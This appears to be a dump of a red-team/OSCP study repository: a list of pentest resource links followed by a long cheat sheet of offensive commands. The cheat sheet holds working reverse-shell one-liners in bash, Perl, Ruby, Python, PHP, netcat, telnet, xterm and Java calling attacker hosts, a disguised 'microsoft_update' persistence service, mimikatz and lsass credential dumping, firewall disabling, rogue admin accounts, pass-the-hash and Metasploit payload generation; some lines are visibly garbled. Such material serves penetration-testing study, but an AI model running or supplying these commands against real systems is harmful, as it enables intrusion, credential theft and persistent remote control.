115 | [Personal Notes for OSCP & Course](https://github.com/generaldespair/OSCP)
116 |
117 | [Buffer Overflow Practice](https://github.com/mikaelkall/vuln)
118 |
119 | [OSCP Cheat Sheet](https://github.com/mikaelkall/OSCP-cheat-sheet)
120 |
121 | [Bunch of interesting 1-liners and notes](https://github.com/gajos112/OSCP)
122 |
123 | [How to teach yourself infosec](https://github.com/thngkaiyuan/how-to-self-learn-infosec)
124 |
125 | ## Non-Preinstalled Kali Tools
126 |
127 | [Doubletap - loud/fast scanner](https://github.com/benrau87/doubletap)
128 |
129 | [Reconnoitre - recon for OSCP](https://github.com/codingo/Reconnoitre)
130 |
131 | [Pandora's Box - bunch of tools](https://github.com/paranoidninja/Pandoras-Box)
132 |
133 | [SleuthQL - SQLi Discovery Tool](https://github.com/RhinoSecurityLabs/SleuthQL)
134 |
135 | [Commix - Command Injection Exploiter](https://github.com/commixproject/commix)
136 |
137 | ## Source Code Review / Analysis
138 |
139 | [Static Analysis Tools](https://github.com/mre/awesome-static-analysis)
140 |
141 | ## Malware Analysis
142 |
143 | [Malware Analysis for Hedgehogs (YouTube)](https://www.youtube.com/channel/UCVFXrUwuWxNlm6UNZtBLJ-A)
144 |
145 | ## Misc
146 |
147 | [Windows Kernel Exploitation](https://rootkits.xyz/blog/2017/06/kernel-setting-up/)
148 |
149 | [Bunch of interesting tools/commands](https://github.com/adon90/pentest_compilation)
150 |
151 | [Forensics Field Guide](https://trailofbits.github.io/ctf/forensics/)
152 |
153 | [Bug Bounty Hunter's Methodology](https://github.com/jhaddix/tbhm)
154 |
155 | [**Fantastic** lecture resource for learning assembly](https://www.youtube.com/watch?v=H4Z0S9ZbC0g)
156 |
157 | [Awesome WAF bypass/command execution filter bypass](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8)
158 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Useful Pentest Commands.md:
--------------------------------------------------------------------------------
1 | ## Nmap Full Web Vulnerable Scan:
2 |
3 | mkdir /usr/share/nmap/scripts/vulscan
4 |
5 | cd /usr/share/nmap/scripts/vulscan
6 |
7 | wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
8 |
9 | nmap -sS -sV –script=vulscan/vulscan.nse target
10 |
11 | nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
12 |
13 | nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
14 |
15 | nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target
16 |
17 | nmap -sV –script=vuln target
18 |
19 | nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target
20 |
21 |
22 | ## Dirb Directory Bruteforce:
23 | dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt
24 |
25 |
26 |
27 | ## Nikto Scanner:
28 | nikto -C all -h http://IP
29 |
30 | ## WordPress Scanner:
31 | wpscan –url http://IP/ –enumerate p
32 |
33 |
34 |
35 | ## Uniscan Scanning:
36 |
37 | uniscan.pl -u target -qweds
38 |
39 | ## HTTP Enumeration:
40 |
41 | httprint -h http://www.example.com -s signatures.txt
42 |
43 | ## SKIP Fish Scanner:
44 |
45 | skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
46 |
47 |
48 |
49 | ## Uniscan Scanning:
50 | uniscan –u http://www.hubbardbrook.org –qweds
51 |
52 | -q – Enable Directory checks
53 |
54 | -w – Enable File Checks
55 |
56 | -e – Enable robots.txt and sitemap.xml check
57 |
58 | -d – Enable Dynamic checks
59 |
60 | -s – Enable Static checks
61 |
62 |
63 | ## Skipfish Scanning:
64 |
65 | m-time threads -LVY donot update after result
66 |
67 | skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
68 |
69 |
70 | ## Nmap Ports Scan:
71 |
72 | 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
73 |
74 | 2)fargement
75 |
76 | 3)data packed – like orginal one not scan packet
77 |
78 | 4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
79 |
80 | 5) nmap –source-port 53 target
81 |
82 | nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
83 |
84 | nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
85 |
86 | nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
87 |
88 | nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
89 |
90 | nmap -sA -PN -sN target
91 |
92 | nmap -sS -sV -T5 -F -A -O target (version detection)
93 |
94 | nmap -sU -v target (Udp)
95 |
96 | nmap -sU -P0 (Udp)
97 |
98 | nmap -sC 192.168.31.10-12 (all scan default)
99 |
100 | ## Netcat Scanning:
101 |
102 | nc -v -w 1 target -z 1-1000
103 |
104 | for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done
105 |
106 | ## US Scanning:
107 |
108 | us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535
109 |
110 | ## Unicornscan Scanning:
111 |
112 | unicornscan X.X.X.X:a -r10000 -v
113 |
114 | ## Kernel Scanning:
115 |
116 | xprobe2 -v -p tcp:80:open 192.168.6.66
117 |
118 | ## Samba Enumeartion:
119 |
120 | nmblookup -A target
121 |
122 | smbclient //MOUNT/share -I target -N
123 |
124 | rpcclient -U “” target
125 |
126 | enum4linux target
127 |
128 |
129 |
130 |
131 | ## SNMP ENumeration:
132 |
133 | snmpget -v 1 -c public IP version
134 |
135 | snmpwalk -v 1 -c public IP
136 |
137 | snmpbulkwalk -v 2 -c public IP
138 |
139 |
140 |
141 |
142 |
143 | ## Windows Useful commands:
144 |
145 | net localgroup Users
146 |
147 | net localgroup Administrators
148 |
149 | search dir/s *.doc
150 |
151 | system(“start cmd.exe /k $cmd”)
152 |
153 | sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
154 |
155 | /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
156 |
157 | mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
158 |
159 | Procdump.exe -accepteula -ma lsass.exe lsass.dmp
160 |
161 | mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
162 |
163 | C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
164 |
165 | C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
166 |
167 |
168 |
169 |
170 | ## Plink Tunnel:
171 |
172 | plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X
173 |
174 | Enable RDP Access:
175 |
176 | reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
177 |
178 | netsh firewall set service remoteadmin enable
179 |
180 | netsh firewall set service remotedesktop enable
181 |
182 | Turn Off Firewall:
183 |
184 | netsh firewall set opmode disable
185 |
186 |
187 | ## Meterpreter:
188 |
189 | run getgui -u admin -p 1234
190 |
191 | run vnc -p 5043
192 |
193 |
194 | ## Add User Windows:
195 |
196 | net user test 1234 /add
197 |
198 | net localgroup administrators test /add
199 |
200 |
201 |
202 | ## Mimikatz:
203 |
204 | privilege::debug
205 |
206 | sekurlsa::logonPasswords full
207 |
208 |
209 | ## Passing the Hash:
210 |
211 | pth-winexe -U hash //IP cmd
212 |
213 |
214 | ## Password Cracking using Hashcat:
215 |
216 | hashcat -m 400 -a 0 hash /root/rockyou.txt
217 |
218 |
219 |
220 |
221 | ## Netcat commands:
222 |
223 | c:> nc -l -p 31337
224 |
225 | #nc 192.168.0.10 31337
226 |
227 | c:> nc -v -w 30 -p 31337 -l < secret.txt
228 |
229 | #nc -v -w 2 192.168.0.10 31337 > secret.txt
230 |
231 |
232 |
233 | ## Banner Grabbing:
234 |
235 | nc 192.168.0.10 80
236 |
237 | GET / HTTP/1.1
238 |
239 | Host: 192.168.0.10
240 |
241 | User-Agent: SPOOFED-BROWSER
242 |
243 | Referrer: K0NSP1RACY.COM
244 |
245 |
246 |
247 |
248 |
249 |
250 | ## window reverse shell:
251 |
252 | c:>nc -Lp 31337 -vv -e cmd.exe
253 |
254 | nc 192.168.0.10 31337
255 |
256 | c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
257 |
258 | nc -lp 80
259 |
260 | #nc -lp 31337 -e /bin/bash
261 |
262 | nc 192.168.0.11 31337
263 |
264 | nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
265 |
266 |
267 |
268 |
269 | ## Find all SUID root files:
270 | find / -user root -perm -4000 -print
271 |
272 | ## Find all SGID root files:
273 | find / -group root -perm -2000 -print
274 |
275 | ## Find all SUID and SGID files owned by anyone:
276 | find / -perm -4000 -o -perm -2000 -print
277 |
278 | ## Find all files that are not owned by any user:
279 | find / -nouser -print
280 |
281 | ## Find all files that are not owned by any group:
282 | find / -nogroup -print
283 |
284 | ## Find all symlinks and what they point to:
285 | find / -type l -ls
286 |
287 |
288 |
289 |
290 | ## Python:
291 |
292 | python -c ‘import pty;pty.spawn(“/bin/bash”)’
293 |
294 | python -m SimpleHTTPServer (Starting HTTP Server)
295 |
296 |
297 | ## PID:
298 |
299 | fuser -nv tcp 80 (list PID of process)
300 |
301 | fuser -k -n tcp 80 (Kill Process of PID)
302 |
303 |
304 | ## Hydra:
305 |
306 | hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)
307 |
308 | Mount Remote Windows Share:
309 |
310 | smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
311 |
312 |
313 | ## Compiling Exploit in Kali:
314 |
315 | gcc -m32 -o output32 hello.c (32 bit)
316 |
317 | gcc -o output hello.c (64 bit)
318 |
319 |
320 |
321 | ## Compiling Windows Exploits on Kali:
322 |
323 | cd /root/.wine/drive_c/MinGW/bin
324 |
325 | wine gcc -o ability.exe /tmp/exploit.c -lwsock32
326 |
327 | wine ability.exe
328 |
329 |
330 | ## NASM Command:
331 |
332 | nasm -f bin -o payload.bin payload.asm
333 |
334 | nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
335 |
336 |
337 |
338 | ## SSH Pivoting:
339 |
340 | ssh -D 127.0.0.1:1080 -p 22 user@IP
341 |
342 | Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
343 |
344 | proxychains commands target
345 |
346 |
347 | ## Pivoting to One Network to Another:
348 |
349 | ssh -D 127.0.0.1:1080 -p 22 user1@IP1
350 |
351 | Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
352 |
353 | proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
354 |
355 | Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
356 |
357 | proxychains commands target
358 |
359 |
360 | ## Pivoting Using metasploit:
361 |
362 | route add 10.1.1.0 255.255.255.0 1
363 |
364 | route add 10.2.2.0 255.255.255.0 1
365 |
366 | use auxiliary/server/socks4a
367 |
368 | run
369 |
370 | proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
371 |
372 |
373 | ## Exploit-DB search using CSV File:
374 |
375 | searchsploit-rb –update
376 |
377 | searchsploit-rb -t webapps -s WEBAPP
378 |
379 | searchsploit-rb –search=”Linux Kernel”
380 |
381 | searchsploit-rb -a “author name” -s “exploit name”
382 |
383 | searchsploit-rb -t remote -s “exploit name”
384 |
385 | searchsploit-rb -p linux -t local -s “exploit name”
386 |
387 |
388 |
389 | ## For Privilege Escalation Exploit search:
390 |
391 | cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3
392 |
393 |
394 |
395 |
396 | ## Metasploit Payloads:
397 |
398 | msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
399 |
400 | msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
401 |
402 | msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
403 |
404 | msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
405 |
406 |
407 |
408 | ## Create a Linux Reverse Meterpreter Binary
409 |
410 | msfpayload linux/x86/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t elf -o shell
411 |
412 | Create Reverse Shell (Shellcode)
413 |
414 | msfpayload windows/shell_reverse_tcp LHOST= LPORT= R | msfencode -b “\x00\x0a\x0d”
415 |
416 | Create a Reverse Shell Python Script
417 |
418 | msfpayload cmd/unix/reverse_python LHOST= LPORT= R > shell.py
419 |
420 | Create a Reverse ASP Shell
421 |
422 | msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t asp -o shell.asp
423 |
424 | Create a Reverse Bash Shell
425 |
426 | msfpayload cmd/unix/reverse_bash LHOST= LPORT= R > shell.sh
427 |
428 |
429 | ## Create a Reverse PHP Shell
430 |
431 | msfpayload php/meterpreter_reverse_tcp LHOST= LPORT= R > shell.php
432 |
433 | Edit shell.php in a text editor to add LPORT= X >shell.exe
438 |
439 |
440 |
441 |
442 | ## Security Commands In Linux:
443 |
444 | ### find programs with a set uid bit
445 | find / -uid 0 -perm -4000
446 |
447 | ### find things that are world writable
448 | find / -perm -o=w
449 |
450 | ### find names with dots and spaces, there shouldn’t be any
451 | find / -name ” ” -print
452 | find / -name “..” -print
453 | find / -name “. ” -print
454 | find / -name ” ” -print
455 |
456 | ### find files that are not owned by anyone
457 | find / -nouser
458 |
459 | ### look for files that are unlinked
460 | lsof +L1
461 |
462 | ### get information about procceses with open ports
463 | lsof -i
464 |
465 | ### look for weird things in arp
466 | arp -a
467 |
468 | ### look at all accounts including AD
469 | getent passwd
470 |
471 | ### look at all groups and membership including AD
472 | getent group
473 |
474 | ### list crontabs for all users including AD
475 | for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done
476 |
477 | ### generate random passwords
478 | cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
479 |
480 | ### find all immutable files, there should not be any
481 | find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
482 |
483 | ### fix immutable files
484 | chattr -i file
485 |
486 |
487 | ## Windows Buffer Overflow Exploitation Commands:
488 |
489 | msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c
490 |
491 |
492 | msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
493 |
494 | ### COMMONLY USED BAD CHARACTERS:
495 | \x00\x0a\x0d\x20 For http request
496 | \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
497 |
498 | ### Useful Commands:
499 |
500 | pattern create
501 |
502 | pattern offset (EIP Address)
503 |
504 | pattern offset (ESP Address)
505 |
506 | add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
507 |
508 | !pvefindaddr pattern_create 5000
509 |
510 | !pvefindaddr suggest
511 |
512 | !pvefindaddr modules
513 |
514 | !pvefindaddr nosafeseh
515 |
516 |
517 | !mona config -set workingfolder C:\Mona\%p
518 |
519 | !mona config -get workingfolder
520 |
521 | !mona mod
522 |
523 | !mona bytearray -b “\x00\x0a”
524 |
525 | !mona pc 5000
526 |
527 | !mona po EIP
528 |
529 | !mona suggest
530 |
531 |
532 |
533 | ## SEH:
534 |
535 | !mona suggest
536 |
537 | !mona nosafeseh
538 |
539 | nseh=”\xeb\x06\x90\x90″ (next seh chain)
540 |
541 | iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
542 |
543 |
544 |
545 | ## ROP (DEP):
546 |
547 | !mona modules
548 |
549 | !mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
550 |
551 | !mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)
552 |
553 |
554 | ## ASLR:
555 |
556 | !mona noaslr
557 |
558 | ## EGG Hunter:
559 |
560 | !mona jmp -r esp
561 |
562 | !mona egg -t lxxl
563 |
564 | \xeb\xc4 (jump backward -60)
565 |
566 | buff=lxxllxxl+shell
567 |
568 | !mona egg -t ‘w00t’
569 |
570 | ## GDB Debugger Commands:
571 |
572 | Setting Breakpoint :
573 |
574 | break *_start
575 |
576 | ### Execute Next Instruction :
577 |
578 | next
579 |
580 | step
581 |
582 | n
583 |
584 | s
585 |
586 | ### Continue Execution :
587 |
588 | continue
589 |
590 | c
591 |
592 | ### Data :
593 |
594 | checking ‘REGISTERS’ and ‘MEMORY’
595 |
596 | Display Register Values : (Decimal , Binary , Hex )
597 |
598 | print /d –> Decimal
599 |
600 | print /t –> Binary
601 |
602 | print /x –> Hex
603 |
604 | O/P :
605 |
606 | (gdb) print /d $eax
607 |
608 | $17 = 13
609 |
610 | (gdb) print /t $eax
611 |
612 | $18 = 1101
613 |
614 | (gdb) print /x $eax
615 |
616 | $19 = 0xd
617 |
618 | (gdb)
619 |
620 |
621 |
622 | Display values of specific memory locations :
623 |
624 | command : x/nyz (Examine)
625 |
626 | n –> Number of fields to display ==>
627 |
628 | y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
629 |
630 | z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
631 |
632 | ## Cheat Codes:
633 |
634 | ## Reverse Shellcode:
635 |
636 | ## BASH:
637 |
638 | bash -i >& /dev/tcp/192.168.23.10/443 0>&1
639 |
640 | exec /bin/bash 0&0 2>&0
641 |
642 | exec /bin/bash 0&0 2>&0
643 |
644 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
645 |
646 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
647 |
648 | exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
649 |
650 | exec 5<>/dev/tcp/attackerip/4444
651 |
652 |
653 | cat <&5 | while read line; do $line 2>&5 >&5; done # or:
654 |
655 | while read line 0<&5; do $line 2>&5 >&5; done
656 |
657 | /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
658 |
659 | /bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
660 |
661 |
662 |
663 |
664 | ## PERL:
665 | Shorter Perl reverse shell that does not depend on /bin/sh:
666 |
667 | perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
668 |
669 | perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
670 |
671 | If the target system is running Windows use the following one-liner:
672 |
673 | perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
674 |
675 | perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
676 |
677 | perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
678 |
679 | perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
680 |
681 |
682 |
683 | ## RUBY:
684 | Longer Ruby reverse shell that does not depend on /bin/sh:
685 |
686 | ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
687 |
688 | ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
689 |
690 | If the target system is running Windows use the following one-liner:
691 |
692 | ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
693 |
694 | ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
695 |
696 | ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
697 |
698 | ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
699 |
700 |
701 |
702 | ## PYTHON:
703 |
704 | python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
705 |
706 | python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
707 |
708 |
709 |
710 | ## PHP:
711 | This code assumes that the TCP connection uses file descriptor 3.
712 |
713 | php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
714 |
715 | php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
716 |
717 | If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK
718 |
719 |
720 | ## NETCAT:
721 |
722 | Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
723 |
724 | nc -e /bin/sh attackerip 4444
725 |
726 | nc -e /bin/sh 192.168.37.10 443
727 |
728 | If the -e option is disabled, try this
729 |
730 | mknod backpipe p && nc 192.168.23.10 443 0backpipe
731 |
732 | mknod backpipe p && nc attackerip 8080 0backpipe
733 |
734 | /bin/sh | nc attackerip 4444
735 |
736 | /bin/sh | nc 192.168.23.10 443
737 |
738 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/
739 |
740 | rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/
741 |
742 | If you have the wrong version of netcat installed, try
743 |
744 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f
745 |
746 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
747 |
748 |
749 |
750 | ## TELNET:
751 | If netcat is not available or /dev/tcp
752 |
753 | mknod backpipe p && telnet attackerip 8080 0backpipe
754 |
755 | mknod backpipe p && telnet attackerip 8080 0backpipe
756 |
757 |
758 |
759 | ## XTERM:
760 | Xterm is the best..
761 |
762 | To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu.
763 |
764 | Xnest :1 # Note: The command starts with uppercase X
765 |
766 | Xnest :1 # Note: The command starts with uppercase X
767 |
768 | Then remember to authorise on your system the target IP to connect to you:
769 | xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
770 |
771 | xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
772 | xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
773 |
774 | If you want anyone to connect to this spawned xterm try:
775 | xhost + # Run this INSIDE the spawned xterm on the open X Server
776 | xhost + # Run this INSIDE the spawned xterm on the open X Server
777 |
778 | Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
779 | xterm -display attackerip:1
780 | xterm -display attackerip:1
781 |
782 | Or:
783 | $ DISPLAY=attackerip:0 xterm
784 | $ DISPLAY=attackerip:0 xterm
785 |
786 | It will try to connect back to you, attackerip, on TCP port 6001.
787 | Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
788 |
789 | /usr/openwin/bin/xterm -display attackerip:1
790 | /usr/openwin/bin/xterm -display attackerip:1
791 |
792 |
793 | ## PHP:
794 | php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’
795 |
796 |
797 | ## JAVA:
798 | r = Runtime.getRuntime()
799 | p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
800 | p.waitFor()
801 |
802 |
803 |
804 |
805 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Useful Snippets.md:
--------------------------------------------------------------------------------
1 | # Useful Snippets
2 |
3 | $ find / -type f -newermt 20xx-xx-01 ! -newermt 20xx-xx-02 -ls 2>/dev/null
4 |
5 | [Source: Ippsec CrimeStoppers](https://www.youtube.com/watch?v=bgKth1K44QA)
6 |
7 | Show everything modified between two dates.
8 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/todo.md:
--------------------------------------------------------------------------------
1 | # To Do
2 |
3 |
4 | - Properly categorise everything
5 |
6 | - Figure out what categories to actually use!
7 | - Binary hacking / web app testing / infrastructure pentesting etc. are all pretty big areas, use these as main categories?
8 | - Method: Keep finding and adding stuff until it becomes unmaintainable without categories.
9 |
10 | - Work on the process document, making things gradually more automated!
11 |
12 |
13 | - Add the following links:
14 |
15 | http://pwnable.kr/
16 |
17 | https://microcorruption.com/login
18 |
19 | https://www.hackthis.co.uk/
20 |
21 | https://www.sabrefilms.co.uk/revolutionelite/
22 |
23 | https://www.wechall.net/
24 |
25 | https://cryptopals.com/
26 |
27 | https://holidayhackchallenge.com/past-challenges/
28 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Red-Team-Notes
2 | OSCP guide and Red Team assessment Guide
3 |
--------------------------------------------------------------------------------